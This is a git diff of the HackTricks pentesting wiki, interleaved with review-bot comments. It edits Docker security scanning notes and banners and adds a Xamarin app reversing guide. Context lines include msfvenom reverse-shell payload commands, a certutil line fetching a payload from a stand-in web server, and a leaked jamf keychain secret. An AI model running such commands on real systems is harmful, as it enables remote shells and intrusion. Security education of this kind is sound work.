diff --git a/.gitbook/assets/image (1) (3) (1) (1) (1).png b/.gitbook/assets/image (1) (3) (1) (1) (1).png
new file mode 100644
index 000000000..4f2d7d140
Binary files /dev/null and b/.gitbook/assets/image (1) (3) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (3) (1) (1).png b/.gitbook/assets/image (1) (3) (1) (1).png
index 4f2d7d140..248451f19 100644
Binary files a/.gitbook/assets/image (1) (3) (1) (1).png and b/.gitbook/assets/image (1) (3) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (3) (1).png b/.gitbook/assets/image (1) (3) (1).png
index 248451f19..7ebaebfa3 100644
Binary files a/.gitbook/assets/image (1) (3) (1).png and b/.gitbook/assets/image (1) (3) (1).png differ
diff --git a/.gitbook/assets/image (1) (3).png b/.gitbook/assets/image (1) (3).png
index 7ebaebfa3..8eae14f0f 100644
Binary files a/.gitbook/assets/image (1) (3).png and b/.gitbook/assets/image (1) (3).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index 8eae14f0f..53e9f7c1f 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (2) (1).png b/.gitbook/assets/image (2) (1) (2) (1).png
new file mode 100644
index 000000000..0f8a86733
Binary files /dev/null and b/.gitbook/assets/image (2) (1) (2) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (2).png b/.gitbook/assets/image (2) (1) (2).png
index 0f8a86733..4bb5f2707 100644
Binary files a/.gitbook/assets/image (2) (1) (2).png and b/.gitbook/assets/image (2) (1) (2).png differ
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png
index 4bb5f2707..4ede9266b 100644
Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index 4ede9266b..d7789e602 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (3) (8).png b/.gitbook/assets/image (3) (8).png
new file mode 100644
index 000000000..0ef3cc20b
Binary files /dev/null and b/.gitbook/assets/image (3) (8).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index 0ef3cc20b..7dcdeb084 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (4) (3) (2).png b/.gitbook/assets/image (4) (3) (2).png
new file mode 100644
index 000000000..1ad2a58a1
Binary files /dev/null and b/.gitbook/assets/image (4) (3) (2).png differ
diff --git a/.gitbook/assets/image (4) (3).png b/.gitbook/assets/image (4) (3).png
index 1ad2a58a1..20ead5c09 100644
Binary files a/.gitbook/assets/image (4) (3).png and b/.gitbook/assets/image (4) (3).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index 20ead5c09..ea50c990a 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index ea50c990a..865dc4ae4 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/README.md b/README.md
index 6e9eea4fc..94d2a7dfd 100644
--- a/README.md
+++ b/README.md
@@ -59,7 +59,7 @@ Get Access Today:
### [HACKENPROOF](https://bit.ly/3xrrDrL)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/SUMMARY.md b/SUMMARY.md
index a126a8626..c423295a5 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -321,6 +321,7 @@
* [iOS UIPasteboard](mobile-pentesting/ios-pentesting/ios-uipasteboard.md)
* [iOS WebViews](mobile-pentesting/ios-pentesting/ios-webviews.md)
* [Cordova Apps](mobile-pentesting/cordova-apps.md)
+* [Xamarin Apps](mobile-pentesting/xamarin-apps.md)
## π½ Network Services Pentesting
diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md
index e80f05450..1d348d7eb 100644
--- a/generic-methodologies-and-resources/pentesting-wifi/README.md
+++ b/generic-methodologies-and-resources/pentesting-wifi/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -307,7 +307,7 @@ So broken and disappeared that I am not going to talk about it. Just know that _
![](<../../.gitbook/assets/image (125).png>)
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -822,7 +822,7 @@ This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group o
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md
index 8f38d9ca3..947253094 100644
--- a/generic-methodologies-and-resources/shells/msfvenom.md
+++ b/generic-methodologies-and-resources/shells/msfvenom.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -194,7 +194,7 @@ msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
```
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md
index cb466659e..c8f88f0bf 100644
--- a/generic-methodologies-and-resources/shells/windows.md
+++ b/generic-methodologies-and-resources/shells/windows.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -329,7 +329,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
**Detected by defender**
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -590,7 +590,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md
index 26f957711..0b52f624f 100644
--- a/linux-hardening/linux-privilege-escalation-checklist.md
+++ b/linux-hardening/linux-privilege-escalation-checklist.md
@@ -14,7 +14,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -169,7 +169,7 @@ Gain reputation points with each verified bug and conquer the top of the weekly
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md
index 6d4ee6d68..d1393702f 100644
--- a/linux-hardening/privilege-escalation/docker-security/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/README.md
@@ -15,7 +15,7 @@ Get Access Today:
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
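Review bot: the bird-emoji link on the changed line still points at a malformed target, `https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md`, before and after this edit; the only change here is escaping the underscore in `https://twitter.com/hacktricks\_life`-style fashion (`hacktricks\_live`), which CommonMark unescapes and is harmless but inconsistent with the unescaped URLs on the rest of the page. Since the line is being touched anyway, point the emoji at `https://emojipedia.org/bird/` to match the speech-balloon link next to it.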
@@ -57,9 +57,9 @@ Containers can have **security vulnerabilities** either because of the base imag
For more [**information read this**](https://docs.docker.com/engine/scan/).
-#### How to scan images
+* **`docker scan`**
-The `docker scan` command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image:
+The **`docker scan`** command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image:
```bash
docker scan hello-world
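Review bot: replacing the `#### How to scan images` heading with the bullet `* **`docker scan`**` removes the heading that grouped the scanning tools (and its `#how-to-scan-images` anchor), so the three tool bullets that follow now hang directly under the paragraph about image vulnerabilities with no section title; keep the heading and put the tool bullets beneath it.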
@@ -77,6 +77,18 @@ Licenses: enabled
Note that we do not currently have vulnerability data for your image.
```
+* [**`trivy`**](https://github.com/aquasecurity/trivy)
+
+```bash
+trivy -q -f json :
+```
+
+* [**`clair-scanner`**](https://github.com/arminc/clair-scanner)
+
+```bash
+clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5
+```
+
### Docker Image Signing
Docker Container images can be stored either in public or private registry. It is needed to **sign** **Container** images to be able to confirm images haven't being tampered. Content **publisher** takes care of **signing** Container image and pushing it into the registry.\
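Review bot: the added `trivy` command, `trivy -q -f json :`, has an empty image reference where the `<image>:<tag>` argument belongs, so it fails as written; write it as `trivy image -q -f json <image>:<tag>` (the `image` subcommand is the current form, the bare `trivy <image>` form is the legacy shorthand). The `clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5` line is syntactically fine but, unlike the `docker scan` entry above it, neither new tool gets a sentence explaining what the arguments are (`-w` is the whitelist file, `--ip` the address at which a running Clair server must reach the scanner); a short line for each would make the list usable.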
@@ -117,6 +129,8 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
When I changed Docker host, I had to move the root keys and repository keys to operate from the new host.
+***
+
![](<../../../.gitbook/assets/image (9) (1) (2).png>)
\
@@ -131,18 +145,18 @@ Get Access Today:
Summary of Container Security Features
-#### Namespaces
+**Namespaces**
Namespaces are useful to isolate a project from the other ones, isolating process communications, network, mounts... It's useful to isolate the docker process from other processes (and even the /proc folder) so it cannot escape abusing other processes.
It could be possible "escape" or more exactly **create new namespaces** using the binary **`unshare`** (that uses the **`unshare`** syscall). Docker by default prevents it, but kubernetes doesn't (at the time of this writtiing).\
Ayway, this is helpful to create new namespaces, but **not to get back to the host defaults namespaces** (unless you have access to some `/proc` inside the host namespaces, where you could use **`nsenter`** to enter in the host namespaces.).
-#### CGroups
+**CGroups**
This allows to limit resources and doesn't affect the security of the isolation of the process (except for the `release_agent` that could be used to escape).
-#### Capabilities Drop
+**Capabilities Drop**
I find this to be one of the **most important** features regarding the process isolation security. This is because without the capabilities, even if the process is running as root **you won't be able to do some privileged actions** (because the called **`syscall`** will return permission error because the process doesn't have the needed capabilities).
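Review bot: turning `#### Namespaces`, `#### CGroups` and `#### Capabilities Drop` into bold text removes these entries from the rendered table of contents and drops their heading anchors, so any existing deep link to `#namespaces` or `#capabilities-drop` breaks; if the goal is only to reduce visual weight, keep them as headings (the page still uses `###` for siblings such as `### Docker Image Signing`). While this region is being edited, the context lines carry two typos, `writtiing` and `Ayway`, that could be fixed in the same commit.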
@@ -154,12 +168,12 @@ Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,ca
```
{% endcode %}
-#### Seccomp
+**Seccomp**
It's enabled by default in Docker. It helps to **limit even more the syscalls** that the process can call.\
The **default Docker Seccomp profile** can be found in [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json)
-#### AppArmor
+**AppArmor**
Docker has a template that you can activate: [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
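Review bot: the same anchor concern applies to this hunk as to the Namespaces/CGroups one: `#### Seccomp` and `#### AppArmor` become bold paragraphs, which removes the `#seccomp` and `#apparmor` anchors and takes both entries out of the table of contents; if they must stop being headings, grep the tree for links to those anchors before merging.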
@@ -293,14 +307,6 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv
For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)
-![](<../../../.gitbook/assets/image (9) (1) (2).png>)
-
-\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
## Other Security Considerations
### Managing Secrets
@@ -334,7 +340,7 @@ If you need your **secret in your running container**, and not just when buildin
With Docker Compose, add the secrets key-value pair to a service and specify the secret file. Hat tip to [Stack Exchange answer](https://serverfault.com/a/936262/535325) for the Docker Compose secrets tip that the example below is adapted from.
-Example docker-compose.yml with secrets:
+Example `docker-compose.yml` with secrets:
```yaml
version: "3.7"
@@ -425,7 +431,7 @@ If you have access to the docker socket or have access to a user in the **docker
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
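Review bot: as in the page header, the only change here is the `\_` escape in `https://twitter.com/hacktricks\_live`, which is harmless but inconsistent with the unescaped URLs elsewhere, while the bird-emoji link on the same line keeps its broken target `.../7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md`; fix that target to `https://emojipedia.org/bird/` while the line is being touched.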
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index a48f93d25..d665ae95e 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -53,7 +53,7 @@ Moreover, after finding proper credentials you could be able to brute-force othe
#### JAMF device Authentication
-
+
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
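Review bot: the context line below the changed image says jamf persists as a LaunchDaemon but gives the path `/Library/LaunchAgents/com.jamf.management.agent.plist`; a plist under `/Library/LaunchAgents/` is loaded by launchd as a per-user LaunchAgent, not a LaunchDaemon (those live under `/Library/LaunchDaemons/`), so either the label or the path is wrong and the sentence should be corrected so defenders look in the right place.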
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md
index c20d8eb74..89c9a64f5 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -174,7 +174,7 @@ First of all, please note that **most of the tricks about privilege escalation a
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index 8b5883a37..db491a49e 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -16,7 +16,7 @@
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
-
+
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
@@ -56,7 +56,7 @@ The events that the Endpoint Security framework can monitor are categorized into
### Endpoint Security Framework Architecture
-
+
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
index fcaefa6f2..8c4154561 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
@@ -189,7 +189,7 @@ Then in order to trigger the execution it would be needed to know some place whe
In x64 versions this is straightforward using the mimikatz-esque **signature hunting** technique to search through **`libcorclr.dll`** for a reference to the symbol **`_hlpDynamicFuncTable`**, which we can dereference:
-
+
All that is left to do is to find an address from which to start our signature search. To do this, we leverage another exposed debugger function, **`MT_GetDCB`**. This returns a number of useful bits of information on the target process, but for our case, we are interested in a field returned containing the **address of a helper function**, **`m_helperRemoteStartAddr`**. Using this address, we know just **where `libcorclr.dll` is located** within the target process memory and we can start our search for the DFT.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
index 5ec636d80..3e89d2445 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
@@ -14,7 +14,7 @@
## Sandbox loading process
-
+
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
index ee0c39981..7c623dec4 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
@@ -393,7 +393,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
-
+
## Reference
diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md
index ed9d5b61e..c9f9fc770 100644
--- a/mobile-pentesting/android-app-pentesting/README.md
+++ b/mobile-pentesting/android-app-pentesting/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -65,7 +65,7 @@ package:/data/app/com.android.insecurebankv2-Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
```
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -218,19 +218,11 @@ Read the following page to learn how to easily access javascript code of React a
### Xamarin Applications
-**Xamarin** apps are written in **C#**, in order to access the C# code **decompressed,** you need to get the files from the **apk**:
+Read the following page to learn how to easily access C# code of a xamarin applications:
-```bash
-7z r app.apk #Or any other zip decompression cmd
-```
-
-Then, decompress all the DLsL using [**xamarin-decompress**](https://github.com/NickstaDB/xamarin-decompress)**:**
-
-```
-python3 xamarin-decompress.py -o /path/to/decompressed/apk
-```
-
-and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
+{% content-ref url="../xamarin-apps.md" %}
+[xamarin-apps.md](../xamarin-apps.md)
+{% endcontent-ref %}
### Superpacked Applications
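Review bot: replacing the inline steps with a `content-ref` is fine, but the removed lines were the only place that said how to get the DLLs out of the APK (`7z r app.apk`, which should have been `7z x app.apk` since `r` is not a 7-Zip command) before running `python3 xamarin-decompress.py -o /path/to/decompressed/apk`; make sure the target page carries the unzip step and not only the decompress step, and fix the `7z` command when it moves. The new intro line also needs a grammar pass: `C# code of a xamarin applications` should read `C# code of Xamarin applications`.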
@@ -265,7 +257,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
[content-protocol.md](content-protocol.md)
{% endcontent-ref %}
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -522,7 +514,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -738,7 +730,7 @@ It is able to:
Useful to detect malware: [https://koodous.com/](https://koodous.com)
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -826,7 +818,7 @@ For more information visit:
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
index 3751c82db..6f965060b 100644
--- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md
+++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -136,7 +136,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term βSmaliβ to refer to instructions. If youβve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -470,7 +470,7 @@ MDM or Mobile Device Management are software suits that are used to **ensure a c
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/mobile-pentesting/xamarin-apps.md b/mobile-pentesting/xamarin-apps.md
new file mode 100644
index 000000000..ae05e1a62
--- /dev/null
+++ b/mobile-pentesting/xamarin-apps.md
@@ -0,0 +1,119 @@
+# Xamarin Apps
+
+
+
+βοΈ HackTricks Cloud βοΈ -π¦ Twitter π¦ - ποΈ Twitch ποΈ - π₯ Youtube π₯
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
+
+## **Basic Information**
+
+Xamarin is an open-source platform that gives developers access to a comprehensive selection of tools and add-ons, allowing them to **create modern apps for iOS, Android, and Windows using .NET and C#** frameworks.
+
+### Xamarin Android Architecture
+
+
+
+Xamarin offers .NET bindings to Android.\* and Java.\* namespaces. Xamarin.
+
+Android applications operate under the Mono execution environment, with the Android Runtime (ART) virtual machine running side by side.
+
+The Mono execution environment calls into these namespaces through Managed Callable Wrappers (MCW) and gives Android Callable Wrappers (ACW) to the ART.
+
+Both these environments run on top of the Linux kernel and invoke various APIs to the user code. The arrangement allows developers to access the underlying system.
+
+### Xamarin iOS Project
+
+Xamarin.iOS applications run under the Mono runtime environment and use full Ahead of Time (AOT) compilation to compile C# .NET codes to ARM assembly language.
+
+It runs along with the Objective-C Runtime. The runtime environments run on top of a UNIX-like kernel and invoke several APIs to the user code, which lets the developers access the underlying managed or native system.
+
+The below-given diagram depicts this architecture:
+
+
+
+### What is .Net Runtime and Mono Framework?
+
+**.Net framework is a set of assemblies, classes, and namespaces** that developers can use to create applications; .Net Runtime runs the compiled code, and the process is called managed code execution. .NET Runtime provides several features that ensure platform independence and are compatible with older framework versions.
+
+**Mono Framework** was started in 2005 as an implementation of the .NET Framework for Linux (Ximian/SuSe/Novell). Sponsored by Microsoft and led by Xamarin, Mono is the .NET framework's open-source implementation based on the ECMA standards for Common Language Runtime and C#.
+
+
+
+## Reverse Engineering Techniques for Xamarin Apps
+
+### Decompilation of Xamarin Assemblies
+
+Decompilation is the process used to produce source code from compiled code. To procure information about the assemblies and executables currently in memory, Windows is a great place.
+
+To open the Modules window, select Debug > Windows > Modules. Once you detect the module that requires decompilation, right-click and select "Decompile Source to Symbol File". This action **builds a symbol file that contains a decompiled source which**, in turn, lets you enter into 3rd party code directly from your source code.
+
+**Visual Studio** decompiles the managed code, even in the absence of symbols, allowing you to look at the code, inspect the variables and set breakpoints. To extract source code to disk, right-click on the module with embedded source and click "Extract Embedded Source ."This will export the source files to a Miscellaneous files folder for further analysis.
+
+### JIT vs AOT Compilation of Xamarin Applications
+
+These two options to compile C# based Xamarin code into an application, i.e, **Just in time compilation and ahead of time compilation**. The way of compilation affects how the application code is shipped within the apk or the ipa file. Let us quickly take a look at it below:
+
+\- **Android**: Xamarin allows you to compile using **both the JIT and the AOT flags for android**. There is also a way to go in between to get the most speed of execution using the Hybrid AOT mode. Note that the Full AOT mode is available only for the Enterprise license.
+
+\- **iOS**: There is only one option in the case of iOS, **ahead-of-time compilation**. This is due to Apple's policies which prohibit the execution of dynamically generated code on a device.
+
+{% hint style="info" %}
+If you encounter a Full AOT compiled application, and if the IL Assembly files are removed to reduce the build size by the developer, then the reversing requires an extra step of extracting dll files from .dll.so files from the lib folder or from the `libmonodroid_bundle_app.so` file. If it is a Hybrid AOT compiled app, and the IL files are still kept in the app bundle, we can use that to reverse engineer the application.
+{% endhint %}
+
+## Getting the dll files from the APK/IPA
+
+Just **unzip the apk/ipa** file and copy all the files present under the assemblies directory:
+
+
+
+In case of Android **APKs these dll files are compressed** and cannot be directly used for decompilation. Luckily there are tools out there that we can use to **uncompress these dll files** like [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) and [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress).
+
+```
+python3 xamarin-decompress.py -o /path/to/decompressed/apk
+```
+
+In the case of the iOS, **dll files inside the IPA files can be directly loaded** into a decompiler (no need to uncompress anything).
+
+**Most of the application code can be found when we decompile the dll files.** Also note that Xamarin Framework based apps contain 90% of common code in the builds of all platforms like iOS and Android etc.
+
+
+
+From the above screenshot of listing the dll files that were present in the apk, we can confirm that it is a Xamarin app. It contains app-specific dll files along with the library files that are required for the app to run, such as `Xamarin.Essentails.dll` or `Mono.Security.dll` .
+
+{% hint style="success" %}
+Finally you can use [**these recommended tools**](../reversing/reversing-tools-basic-methods/#net-decompiler) to access the **C# code** from the DLLs.
+{% endhint %}
+
+## Dynamic Analysis
+
+Try to check if the application has any kind of SSL pinning in place. If not, using Burp as a system, CA should work for intercepting requests. **Frida with Java or ObjC runtime wonβt work** here, but luckily thereβs a tool out there that can be used for hooking into methods.
+
